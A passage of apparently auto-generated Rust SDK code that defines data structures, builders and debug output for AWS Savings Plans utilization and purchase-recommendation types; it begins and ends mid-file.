pub mod savings_plans_utilization_by_time {
    /// A builder for [`SavingsPlansUtilizationByTime`](crate::model::SavingsPlansUtilizationByTime)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
        pub(crate) utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
        pub(crate) savings: std::option::Option<crate::model::SavingsPlansSavings>,
        pub(crate) amortized_commitment:
            std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
    }
    impl Builder {
        /// <p>The time period of the request. </p>
        pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
            self.time_period = Some(input);
            self
        }
        /// Sets `time_period` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_time_period(
            mut self,
            input: std::option::Option<crate::model::DateInterval>,
        ) -> Self {
            self.time_period = input;
            self
        }
        /// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
        /// that are Savings Plans eligible.</p>
        pub fn utilization(mut self, input: crate::model::SavingsPlansUtilization) -> Self {
            self.utilization = Some(input);
            self
        }
        /// Sets `utilization` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_utilization(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansUtilization>,
        ) -> Self {
            self.utilization = input;
            self
        }
        /// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
        /// from Savings Plans as well as the <code>onDemandCostEquivalent</code> of the Savings
        /// Plans when considering the utilization rate.</p>
        pub fn savings(mut self, input: crate::model::SavingsPlansSavings) -> Self {
            self.savings = Some(input);
            self
        }
        /// Sets `savings` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_savings(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansSavings>,
        ) -> Self {
            self.savings = input;
            self
        }
        /// <p>The total amortized commitment for a Savings Plans. This includes the sum of the
        /// upfront and recurring Savings Plans fees.</p>
        pub fn amortized_commitment(
            mut self,
            input: crate::model::SavingsPlansAmortizedCommitment,
        ) -> Self {
            self.amortized_commitment = Some(input);
            self
        }
        /// Sets `amortized_commitment` from an `Option`, replacing any previously configured
        /// value (`None` clears it).
        pub fn set_amortized_commitment(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
        ) -> Self {
            self.amortized_commitment = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansUtilizationByTime`](crate::model::SavingsPlansUtilizationByTime)
        pub fn build(self) -> crate::model::SavingsPlansUtilizationByTime {
            crate::model::SavingsPlansUtilizationByTime {
                time_period: self.time_period,
                utilization: self.utilization,
                savings: self.savings,
                amortized_commitment: self.amortized_commitment,
            }
        }
    }
}
impl SavingsPlansUtilizationByTime {
    /// Creates a new builder-style object to manufacture [`SavingsPlansUtilizationByTime`](crate::model::SavingsPlansUtilizationByTime)
    pub fn builder() -> crate::model::savings_plans_utilization_by_time::Builder {
        // The builder derives `Default`, so the zero-value builder is the starting point.
        std::default::Default::default()
    }
}
/// <p>Contains your request parameters, Savings Plan Recommendations Summary, and
/// Details.</p>
// NOTE(review): echoes the request parameters (scope, type, term, payment option,
// lookback) alongside the computed details and summary; all fields are optional.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansPurchaseRecommendation {
    /// <p>The account scope that you want your recommendations for. Amazon Web Services
    /// calculates recommendations that include the management account and member accounts if
    /// the value is set to <code>PAYER</code>. If the value is <code>LINKED</code>,
    /// recommendations are calculated for individual member accounts only.</p>
    pub account_scope: std::option::Option<crate::model::AccountScope>,
    /// <p>The requested Savings Plans recommendation type.</p>
    pub savings_plans_type: std::option::Option<crate::model::SupportedSavingsPlansType>,
    /// <p>The Savings Plans recommendation term in years. It's used to generate the
    /// recommendation.</p>
    pub term_in_years: std::option::Option<crate::model::TermInYears>,
    /// <p>The payment option used to generate the recommendation.</p>
    pub payment_option: std::option::Option<crate::model::PaymentOption>,
    /// <p>The lookback period in days, used to generate the recommendation.</p>
    pub lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
    /// <p>Details for the Savings Plans we recommend that you purchase to cover existing Savings
    /// Plans eligible workloads.</p>
    pub savings_plans_purchase_recommendation_details:
        std::option::Option<std::vec::Vec<crate::model::SavingsPlansPurchaseRecommendationDetail>>,
    /// <p>Summary metrics for your Savings Plans Recommendations. </p>
    pub savings_plans_purchase_recommendation_summary:
        std::option::Option<crate::model::SavingsPlansPurchaseRecommendationSummary>,
}
impl std::fmt::Debug for SavingsPlansPurchaseRecommendation {
    /// Renders the struct with each field labeled by its Rust field name.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("SavingsPlansPurchaseRecommendation")
            .field("account_scope", &self.account_scope)
            .field("savings_plans_type", &self.savings_plans_type)
            .field("term_in_years", &self.term_in_years)
            .field("payment_option", &self.payment_option)
            .field("lookback_period_in_days", &self.lookback_period_in_days)
            .field(
                "savings_plans_purchase_recommendation_details",
                &self.savings_plans_purchase_recommendation_details,
            )
            .field(
                "savings_plans_purchase_recommendation_summary",
                &self.savings_plans_purchase_recommendation_summary,
            )
            .finish()
    }
}
/// See [`SavingsPlansPurchaseRecommendation`](crate::model::SavingsPlansPurchaseRecommendation)
pub mod savings_plans_purchase_recommendation {
    /// A builder for [`SavingsPlansPurchaseRecommendation`](crate::model::SavingsPlansPurchaseRecommendation)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) account_scope: std::option::Option<crate::model::AccountScope>,
        pub(crate) savings_plans_type: std::option::Option<crate::model::SupportedSavingsPlansType>,
        pub(crate) term_in_years: std::option::Option<crate::model::TermInYears>,
        pub(crate) payment_option: std::option::Option<crate::model::PaymentOption>,
        pub(crate) lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
        pub(crate) savings_plans_purchase_recommendation_details: std::option::Option<
            std::vec::Vec<crate::model::SavingsPlansPurchaseRecommendationDetail>,
        >,
        pub(crate) savings_plans_purchase_recommendation_summary:
            std::option::Option<crate::model::SavingsPlansPurchaseRecommendationSummary>,
    }
    impl Builder {
        /// <p>The account scope that you want your recommendations for. Amazon Web Services
        /// calculates recommendations that include the management account and member accounts if
        /// the value is set to <code>PAYER</code>. If the value is <code>LINKED</code>,
        /// recommendations are calculated for individual member accounts only.</p>
        pub fn account_scope(mut self, input: crate::model::AccountScope) -> Self {
            self.account_scope = Some(input);
            self
        }
        /// Sets `account_scope` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_account_scope(
            mut self,
            input: std::option::Option<crate::model::AccountScope>,
        ) -> Self {
            self.account_scope = input;
            self
        }
        /// <p>The requested Savings Plans recommendation type.</p>
        pub fn savings_plans_type(
            mut self,
            input: crate::model::SupportedSavingsPlansType,
        ) -> Self {
            self.savings_plans_type = Some(input);
            self
        }
        /// Sets `savings_plans_type` from an `Option`, replacing any previously configured
        /// value (`None` clears it).
        pub fn set_savings_plans_type(
            mut self,
            input: std::option::Option<crate::model::SupportedSavingsPlansType>,
        ) -> Self {
            self.savings_plans_type = input;
            self
        }
        /// <p>The Savings Plans recommendation term in years. It's used to generate the
        /// recommendation.</p>
        pub fn term_in_years(mut self, input: crate::model::TermInYears) -> Self {
            self.term_in_years = Some(input);
            self
        }
        /// Sets `term_in_years` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_term_in_years(
            mut self,
            input: std::option::Option<crate::model::TermInYears>,
        ) -> Self {
            self.term_in_years = input;
            self
        }
        /// <p>The payment option used to generate the recommendation.</p>
        pub fn payment_option(mut self, input: crate::model::PaymentOption) -> Self {
            self.payment_option = Some(input);
            self
        }
        /// Sets `payment_option` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_payment_option(
            mut self,
            input: std::option::Option<crate::model::PaymentOption>,
        ) -> Self {
            self.payment_option = input;
            self
        }
        /// <p>The lookback period in days, used to generate the recommendation.</p>
        pub fn lookback_period_in_days(
            mut self,
            input: crate::model::LookbackPeriodInDays,
        ) -> Self {
            self.lookback_period_in_days = Some(input);
            self
        }
        /// Sets `lookback_period_in_days` from an `Option`, replacing any previously
        /// configured value (`None` clears it).
        pub fn set_lookback_period_in_days(
            mut self,
            input: std::option::Option<crate::model::LookbackPeriodInDays>,
        ) -> Self {
            self.lookback_period_in_days = input;
            self
        }
        /// Appends one recommendation detail to
        /// `savings_plans_purchase_recommendation_details`, creating the list on first use.
        pub fn savings_plans_purchase_recommendation_details(
            mut self,
            input: impl Into<crate::model::SavingsPlansPurchaseRecommendationDetail>,
        ) -> Self {
            let mut v = self
                .savings_plans_purchase_recommendation_details
                .unwrap_or_default();
            v.push(input.into());
            self.savings_plans_purchase_recommendation_details = Some(v);
            self
        }
        /// Replaces the entire recommendation-details list with the given `Option`
        /// (`None` clears it).
        pub fn set_savings_plans_purchase_recommendation_details(
            mut self,
            input: std::option::Option<
                std::vec::Vec<crate::model::SavingsPlansPurchaseRecommendationDetail>,
            >,
        ) -> Self {
            self.savings_plans_purchase_recommendation_details = input;
            self
        }
        /// <p>Summary metrics for your Savings Plans Recommendations. </p>
        pub fn savings_plans_purchase_recommendation_summary(
            mut self,
            input: crate::model::SavingsPlansPurchaseRecommendationSummary,
        ) -> Self {
            self.savings_plans_purchase_recommendation_summary = Some(input);
            self
        }
        /// Sets `savings_plans_purchase_recommendation_summary` from an `Option`, replacing
        /// any previously configured value (`None` clears it).
        pub fn set_savings_plans_purchase_recommendation_summary(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansPurchaseRecommendationSummary>,
        ) -> Self {
            self.savings_plans_purchase_recommendation_summary = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansPurchaseRecommendation`](crate::model::SavingsPlansPurchaseRecommendation)
        pub fn build(self) -> crate::model::SavingsPlansPurchaseRecommendation {
            crate::model::SavingsPlansPurchaseRecommendation {
                account_scope: self.account_scope,
                savings_plans_type: self.savings_plans_type,
                term_in_years: self.term_in_years,
                payment_option: self.payment_option,
                lookback_period_in_days: self.lookback_period_in_days,
                savings_plans_purchase_recommendation_details: self
                    .savings_plans_purchase_recommendation_details,
                savings_plans_purchase_recommendation_summary: self
                    .savings_plans_purchase_recommendation_summary,
            }
        }
    }
}
impl SavingsPlansPurchaseRecommendation {
    /// Creates a new builder-style object to manufacture [`SavingsPlansPurchaseRecommendation`](crate::model::SavingsPlansPurchaseRecommendation)
    pub fn builder() -> crate::model::savings_plans_purchase_recommendation::Builder {
        // The builder derives `Default`, so the zero-value builder is the starting point.
        std::default::Default::default()
    }
}
/// <p>Summary metrics for your Savings Plans Purchase Recommendations.</p>
// NOTE(review): all metrics are service-provided strings — presumably decimal amounts
// in `currency_code` units; confirm the format before parsing numerically.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansPurchaseRecommendationSummary {
    /// <p>The estimated return on investment that's based on the recommended Savings Plans and
    /// estimated savings.</p>
    pub estimated_roi: std::option::Option<std::string::String>,
    /// <p>The currency code that Amazon Web Services used to generate the recommendations and
    /// present potential savings.</p>
    pub currency_code: std::option::Option<std::string::String>,
    /// <p>The estimated total cost of the usage after purchasing the recommended Savings Plans.
    /// This is a sum of the cost of Savings Plans during this term, and the remaining On-Demand
    /// usage.</p>
    pub estimated_total_cost: std::option::Option<std::string::String>,
    /// <p>The current total on demand spend of the applicable usage types over the lookback
    /// period.</p>
    pub current_on_demand_spend: std::option::Option<std::string::String>,
    /// <p>The estimated total savings over the lookback period, based on the purchase of the
    /// recommended Savings Plans.</p>
    pub estimated_savings_amount: std::option::Option<std::string::String>,
    /// <p>The aggregate number of Savings Plans recommendations that exist for your
    /// account.</p>
    pub total_recommendation_count: std::option::Option<std::string::String>,
    /// <p>The recommended Savings Plans cost on a daily (24 hourly) basis.</p>
    pub daily_commitment_to_purchase: std::option::Option<std::string::String>,
    /// <p>The recommended hourly commitment that's based on the recommendation
    /// parameters.</p>
    pub hourly_commitment_to_purchase: std::option::Option<std::string::String>,
    /// <p>The estimated savings relative to the total cost of On-Demand usage, over the lookback
    /// period. This is calculated as <code>estimatedSavingsAmount</code>/
    /// <code>CurrentOnDemandSpend</code>*100.</p>
    pub estimated_savings_percentage: std::option::Option<std::string::String>,
    /// <p>The estimated monthly savings amount that's based on the recommended Savings Plans
    /// purchase.</p>
    pub estimated_monthly_savings_amount: std::option::Option<std::string::String>,
    /// <p> The estimated On-Demand costs you would expect with no additional commitment. It's
    /// based on your usage of the selected time period and the Savings Plans you own. </p>
    pub estimated_on_demand_cost_with_current_commitment: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansPurchaseRecommendationSummary {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Render every field, in declaration order, via one builder chain.
        f.debug_struct("SavingsPlansPurchaseRecommendationSummary")
            .field("estimated_roi", &self.estimated_roi)
            .field("currency_code", &self.currency_code)
            .field("estimated_total_cost", &self.estimated_total_cost)
            .field("current_on_demand_spend", &self.current_on_demand_spend)
            .field("estimated_savings_amount", &self.estimated_savings_amount)
            .field("total_recommendation_count", &self.total_recommendation_count)
            .field(
                "daily_commitment_to_purchase",
                &self.daily_commitment_to_purchase,
            )
            .field(
                "hourly_commitment_to_purchase",
                &self.hourly_commitment_to_purchase,
            )
            .field(
                "estimated_savings_percentage",
                &self.estimated_savings_percentage,
            )
            .field(
                "estimated_monthly_savings_amount",
                &self.estimated_monthly_savings_amount,
            )
            .field(
                "estimated_on_demand_cost_with_current_commitment",
                &self.estimated_on_demand_cost_with_current_commitment,
            )
            .finish()
    }
}
/// See [`SavingsPlansPurchaseRecommendationSummary`](crate::model::SavingsPlansPurchaseRecommendationSummary)
pub mod savings_plans_purchase_recommendation_summary {
    /// A builder for [`SavingsPlansPurchaseRecommendationSummary`](crate::model::SavingsPlansPurchaseRecommendationSummary)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) estimated_roi: std::option::Option<std::string::String>,
        pub(crate) currency_code: std::option::Option<std::string::String>,
        pub(crate) estimated_total_cost: std::option::Option<std::string::String>,
        pub(crate) current_on_demand_spend: std::option::Option<std::string::String>,
        pub(crate) estimated_savings_amount: std::option::Option<std::string::String>,
        pub(crate) total_recommendation_count: std::option::Option<std::string::String>,
        pub(crate) daily_commitment_to_purchase: std::option::Option<std::string::String>,
        pub(crate) hourly_commitment_to_purchase: std::option::Option<std::string::String>,
        pub(crate) estimated_savings_percentage: std::option::Option<std::string::String>,
        pub(crate) estimated_monthly_savings_amount: std::option::Option<std::string::String>,
        pub(crate) estimated_on_demand_cost_with_current_commitment:
            std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The estimated return on investment that's based on the recommended Savings Plans and
        /// estimated savings.</p>
        pub fn estimated_roi(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_roi = Some(input.into());
            self
        }
        /// <p>The estimated return on investment that's based on the recommended Savings Plans and
        /// estimated savings.</p>
        pub fn set_estimated_roi(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_roi = input;
            self
        }
        /// <p>The currency code that Amazon Web Services used to generate the recommendations and
        /// present potential savings.</p>
        pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
            self.currency_code = Some(input.into());
            self
        }
        /// <p>The currency code that Amazon Web Services used to generate the recommendations and
        /// present potential savings.</p>
        pub fn set_currency_code(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.currency_code = input;
            self
        }
        /// <p>The estimated total cost of the usage after purchasing the recommended Savings Plans.
        /// This is a sum of the cost of Savings Plans during this term, and the remaining On-Demand
        /// usage.</p>
        pub fn estimated_total_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_total_cost = Some(input.into());
            self
        }
        /// <p>The estimated total cost of the usage after purchasing the recommended Savings Plans.
        /// This is a sum of the cost of Savings Plans during this term, and the remaining On-Demand
        /// usage.</p>
        pub fn set_estimated_total_cost(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_total_cost = input;
            self
        }
        /// <p>The current total on demand spend of the applicable usage types over the lookback
        /// period.</p>
        pub fn current_on_demand_spend(mut self, input: impl Into<std::string::String>) -> Self {
            self.current_on_demand_spend = Some(input.into());
            self
        }
        /// <p>The current total on demand spend of the applicable usage types over the lookback
        /// period.</p>
        pub fn set_current_on_demand_spend(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.current_on_demand_spend = input;
            self
        }
        /// <p>The estimated total savings over the lookback period, based on the purchase of the
        /// recommended Savings Plans.</p>
        pub fn estimated_savings_amount(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_savings_amount = Some(input.into());
            self
        }
        /// <p>The estimated total savings over the lookback period, based on the purchase of the
        /// recommended Savings Plans.</p>
        pub fn set_estimated_savings_amount(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_savings_amount = input;
            self
        }
        /// <p>The aggregate number of Savings Plans recommendations that exist for your
        /// account.</p>
        pub fn total_recommendation_count(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_recommendation_count = Some(input.into());
            self
        }
        /// <p>The aggregate number of Savings Plans recommendations that exist for your
        /// account.</p>
        pub fn set_total_recommendation_count(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_recommendation_count = input;
            self
        }
        /// <p>The recommended Savings Plans cost on a daily (24 hourly) basis.</p>
        pub fn daily_commitment_to_purchase(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.daily_commitment_to_purchase = Some(input.into());
            self
        }
        /// <p>The recommended Savings Plans cost on a daily (24 hourly) basis.</p>
        pub fn set_daily_commitment_to_purchase(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.daily_commitment_to_purchase = input;
            self
        }
        /// <p>The recommended hourly commitment that's based on the recommendation
        /// parameters.</p>
        pub fn hourly_commitment_to_purchase(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.hourly_commitment_to_purchase = Some(input.into());
            self
        }
        /// <p>The recommended hourly commitment that's based on the recommendation
        /// parameters.</p>
        pub fn set_hourly_commitment_to_purchase(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.hourly_commitment_to_purchase = input;
            self
        }
        /// <p>The estimated savings relative to the total cost of On-Demand usage, over the lookback
        /// period. This is calculated as <code>estimatedSavingsAmount</code>/
        /// <code>CurrentOnDemandSpend</code>*100.</p>
        pub fn estimated_savings_percentage(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_savings_percentage = Some(input.into());
            self
        }
        /// <p>The estimated savings relative to the total cost of On-Demand usage, over the lookback
        /// period. This is calculated as <code>estimatedSavingsAmount</code>/
        /// <code>CurrentOnDemandSpend</code>*100.</p>
        pub fn set_estimated_savings_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_savings_percentage = input;
            self
        }
        /// <p>The estimated monthly savings amount that's based on the recommended Savings Plans
        /// purchase.</p>
        pub fn estimated_monthly_savings_amount(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings_amount = Some(input.into());
            self
        }
        /// <p>The estimated monthly savings amount that's based on the recommended Savings Plans
        /// purchase.</p>
        pub fn set_estimated_monthly_savings_amount(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings_amount = input;
            self
        }
        /// <p> The estimated On-Demand costs you would expect with no additional commitment. It's
        /// based on your usage of the selected time period and the Savings Plans you own. </p>
        pub fn estimated_on_demand_cost_with_current_commitment(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.estimated_on_demand_cost_with_current_commitment = Some(input.into());
            self
        }
        /// <p> The estimated On-Demand costs you would expect with no additional commitment. It's
        /// based on your usage of the selected time period and the Savings Plans you own. </p>
        pub fn set_estimated_on_demand_cost_with_current_commitment(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_on_demand_cost_with_current_commitment = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansPurchaseRecommendationSummary`](crate::model::SavingsPlansPurchaseRecommendationSummary)
        pub fn build(self) -> crate::model::SavingsPlansPurchaseRecommendationSummary {
            crate::model::SavingsPlansPurchaseRecommendationSummary {
                estimated_roi: self.estimated_roi,
                currency_code: self.currency_code,
                estimated_total_cost: self.estimated_total_cost,
                current_on_demand_spend: self.current_on_demand_spend,
                estimated_savings_amount: self.estimated_savings_amount,
                total_recommendation_count: self.total_recommendation_count,
                daily_commitment_to_purchase: self.daily_commitment_to_purchase,
                hourly_commitment_to_purchase: self.hourly_commitment_to_purchase,
                estimated_savings_percentage: self.estimated_savings_percentage,
                estimated_monthly_savings_amount: self.estimated_monthly_savings_amount,
                estimated_on_demand_cost_with_current_commitment: self
                    .estimated_on_demand_cost_with_current_commitment,
            }
        }
    }
}
impl SavingsPlansPurchaseRecommendationSummary {
    /// Creates a new builder-style object to manufacture [`SavingsPlansPurchaseRecommendationSummary`](crate::model::SavingsPlansPurchaseRecommendationSummary)
    pub fn builder() -> crate::model::savings_plans_purchase_recommendation_summary::Builder {
        // The return type pins the concrete builder; rely on type inference.
        std::default::Default::default()
    }
}
/// <p>Details for your recommended Savings Plans.</p>
///
/// Apart from `savings_plans_details`, every metric below is carried as an
/// optional string — no numeric parsing or validation is performed by this type.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansPurchaseRecommendationDetail {
    /// <p>Details for your recommended Savings Plans.</p>
    pub savings_plans_details: std::option::Option<crate::model::SavingsPlansDetails>,
    /// <p>The <code>AccountID</code> the recommendation is generated for.</p>
    pub account_id: std::option::Option<std::string::String>,
    /// <p>The upfront cost of the recommended Savings Plans, based on the selected payment
    /// option.</p>
    pub upfront_cost: std::option::Option<std::string::String>,
    /// <p>The estimated return on investment that's based on the recommended Savings Plans that
    /// you purchased. This is calculated as <code>estimatedSavingsAmount</code>/
    /// <code>estimatedSPCost</code>*100.</p>
    pub estimated_roi: std::option::Option<std::string::String>,
    /// <p>The currency code that Amazon Web Services used to generate the recommendations and
    /// present potential savings.</p>
    pub currency_code: std::option::Option<std::string::String>,
    /// <p>The cost of the recommended Savings Plans over the length of the lookback
    /// period.</p>
    pub estimated_sp_cost: std::option::Option<std::string::String>,
    /// <p>The remaining On-Demand cost estimated to not be covered by the recommended Savings
    /// Plans, over the length of the lookback period.</p>
    pub estimated_on_demand_cost: std::option::Option<std::string::String>,
    /// <p> The estimated On-Demand costs you would expect with no additional commitment, based
    /// on your usage of the selected time period and the Savings Plans you own. </p>
    pub estimated_on_demand_cost_with_current_commitment: std::option::Option<std::string::String>,
    /// <p>The estimated savings amount that's based on the recommended Savings Plans over the
    /// length of the lookback period.</p>
    pub estimated_savings_amount: std::option::Option<std::string::String>,
    /// <p>The estimated savings percentage relative to the total cost of applicable On-Demand
    /// usage over the lookback period.</p>
    pub estimated_savings_percentage: std::option::Option<std::string::String>,
    /// <p>The recommended hourly commitment level for the Savings Plans type and the
    /// configuration that's based on the usage during the lookback period.</p>
    pub hourly_commitment_to_purchase: std::option::Option<std::string::String>,
    /// <p>The estimated utilization of the recommended Savings Plans.</p>
    pub estimated_average_utilization: std::option::Option<std::string::String>,
    /// <p>The estimated monthly savings amount based on the recommended Savings Plans.</p>
    pub estimated_monthly_savings_amount: std::option::Option<std::string::String>,
    /// <p>The lowest value of hourly On-Demand spend over the lookback period of the applicable
    /// usage type.</p>
    pub current_minimum_hourly_on_demand_spend: std::option::Option<std::string::String>,
    /// <p>The highest value of hourly On-Demand spend over the lookback period of the applicable
    /// usage type.</p>
    pub current_maximum_hourly_on_demand_spend: std::option::Option<std::string::String>,
    /// <p>The average value of hourly On-Demand spend over the lookback period of the applicable
    /// usage type.</p>
    pub current_average_hourly_on_demand_spend: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansPurchaseRecommendationDetail {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Render every field, in declaration order, via one builder chain.
        f.debug_struct("SavingsPlansPurchaseRecommendationDetail")
            .field("savings_plans_details", &self.savings_plans_details)
            .field("account_id", &self.account_id)
            .field("upfront_cost", &self.upfront_cost)
            .field("estimated_roi", &self.estimated_roi)
            .field("currency_code", &self.currency_code)
            .field("estimated_sp_cost", &self.estimated_sp_cost)
            .field("estimated_on_demand_cost", &self.estimated_on_demand_cost)
            .field(
                "estimated_on_demand_cost_with_current_commitment",
                &self.estimated_on_demand_cost_with_current_commitment,
            )
            .field("estimated_savings_amount", &self.estimated_savings_amount)
            .field(
                "estimated_savings_percentage",
                &self.estimated_savings_percentage,
            )
            .field(
                "hourly_commitment_to_purchase",
                &self.hourly_commitment_to_purchase,
            )
            .field(
                "estimated_average_utilization",
                &self.estimated_average_utilization,
            )
            .field(
                "estimated_monthly_savings_amount",
                &self.estimated_monthly_savings_amount,
            )
            .field(
                "current_minimum_hourly_on_demand_spend",
                &self.current_minimum_hourly_on_demand_spend,
            )
            .field(
                "current_maximum_hourly_on_demand_spend",
                &self.current_maximum_hourly_on_demand_spend,
            )
            .field(
                "current_average_hourly_on_demand_spend",
                &self.current_average_hourly_on_demand_spend,
            )
            .finish()
    }
}
/// See [`SavingsPlansPurchaseRecommendationDetail`](crate::model::SavingsPlansPurchaseRecommendationDetail)
pub mod savings_plans_purchase_recommendation_detail {
    /// A builder for [`SavingsPlansPurchaseRecommendationDetail`](crate::model::SavingsPlansPurchaseRecommendationDetail)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) savings_plans_details: std::option::Option<crate::model::SavingsPlansDetails>,
        pub(crate) account_id: std::option::Option<std::string::String>,
        pub(crate) upfront_cost: std::option::Option<std::string::String>,
        pub(crate) estimated_roi: std::option::Option<std::string::String>,
        pub(crate) currency_code: std::option::Option<std::string::String>,
        pub(crate) estimated_sp_cost: std::option::Option<std::string::String>,
        pub(crate) estimated_on_demand_cost: std::option::Option<std::string::String>,
        pub(crate) estimated_on_demand_cost_with_current_commitment:
            std::option::Option<std::string::String>,
        pub(crate) estimated_savings_amount: std::option::Option<std::string::String>,
        pub(crate) estimated_savings_percentage: std::option::Option<std::string::String>,
        pub(crate) hourly_commitment_to_purchase: std::option::Option<std::string::String>,
        pub(crate) estimated_average_utilization: std::option::Option<std::string::String>,
        pub(crate) estimated_monthly_savings_amount: std::option::Option<std::string::String>,
        pub(crate) current_minimum_hourly_on_demand_spend: std::option::Option<std::string::String>,
        pub(crate) current_maximum_hourly_on_demand_spend: std::option::Option<std::string::String>,
        pub(crate) current_average_hourly_on_demand_spend: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>Details for your recommended Savings Plans.</p>
        pub fn savings_plans_details(mut self, input: crate::model::SavingsPlansDetails) -> Self {
            self.savings_plans_details = Some(input);
            self
        }
        /// <p>Details for your recommended Savings Plans.</p>
        pub fn set_savings_plans_details(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansDetails>,
        ) -> Self {
            self.savings_plans_details = input;
            self
        }
        /// <p>The <code>AccountID</code> the recommendation is generated for.</p>
        pub fn account_id(mut self, input: impl Into<std::string::String>) -> Self {
            self.account_id = Some(input.into());
            self
        }
        /// <p>The <code>AccountID</code> the recommendation is generated for.</p>
        pub fn set_account_id(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.account_id = input;
            self
        }
        /// <p>The upfront cost of the recommended Savings Plans, based on the selected payment
        /// option.</p>
        pub fn upfront_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.upfront_cost = Some(input.into());
            self
        }
        /// <p>The upfront cost of the recommended Savings Plans, based on the selected payment
        /// option.</p>
        pub fn set_upfront_cost(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.upfront_cost = input;
            self
        }
        /// <p>The estimated return on investment that's based on the recommended Savings Plans that
        /// you purchased. This is calculated as <code>estimatedSavingsAmount</code>/
        /// <code>estimatedSPCost</code>*100.</p>
        pub fn estimated_roi(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_roi = Some(input.into());
            self
        }
        /// <p>The estimated return on investment that's based on the recommended Savings Plans that
        /// you purchased. This is calculated as <code>estimatedSavingsAmount</code>/
        /// <code>estimatedSPCost</code>*100.</p>
        pub fn set_estimated_roi(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_roi = input;
            self
        }
        /// <p>The currency code that Amazon Web Services used to generate the recommendations and
        /// present potential savings.</p>
        pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
            self.currency_code = Some(input.into());
            self
        }
        /// <p>The currency code that Amazon Web Services used to generate the recommendations and
        /// present potential savings.</p>
        pub fn set_currency_code(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.currency_code = input;
            self
        }
        /// <p>The cost of the recommended Savings Plans over the length of the lookback
        /// period.</p>
        pub fn estimated_sp_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_sp_cost = Some(input.into());
            self
        }
        /// <p>The cost of the recommended Savings Plans over the length of the lookback
        /// period.</p>
        pub fn set_estimated_sp_cost(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_sp_cost = input;
            self
        }
        /// <p>The remaining On-Demand cost estimated to not be covered by the recommended Savings
        /// Plans, over the length of the lookback period.</p>
